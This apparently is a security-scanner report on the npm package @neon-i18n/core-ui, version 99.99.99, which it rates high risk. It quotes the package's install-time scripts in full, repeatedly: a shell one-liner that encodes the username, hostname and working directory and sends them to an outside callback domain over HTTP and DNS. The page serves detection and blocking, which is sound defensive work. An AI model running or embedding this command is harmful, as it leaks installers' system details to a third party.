npm · registry.npmjs.org
@neon-i18n/core-ui
Install Lifecycle Remote Or Exec: preinstall="b64=$(printf '%s' \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgsub=$(printf '%s' \"$npm_package_name\" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' \"$npm_package_name\" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk"
Why PkgRadar flagged 99.99.99
| Severity | Signal | Evidence |
|---|---|---|
| high | Install Lifecycle Remote Or Exec | preinstall="b64=$(printf '%s' \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgsub=$(printf '%s' \"$npm_package_name\" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' \"$npm_package_name\" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk" · package.json |
| high | Install Lifecycle Remote Or Exec | install="b64=$(printf '%s' \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgsub=$(printf '%s' \"$npm_package_name\" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' \"$npm_package_name\" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk" · package.json |
| high | Install Lifecycle Repeated Payload | preinstall,install="b64=$(printf '%s' \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgsub=$(printf '%s' \"$npm_package_name\" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' \"$npm_package_name\" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk" · package.json |
Scanned versions
| Version | Verdict | Score | Scanned (UTC) |
|---|---|---|---|
99.99.99 | High risk | 95 | 2026-05-28 |
Block this in CI
pkgradar gate --ecosystem npm @neon-i18n/[email protected]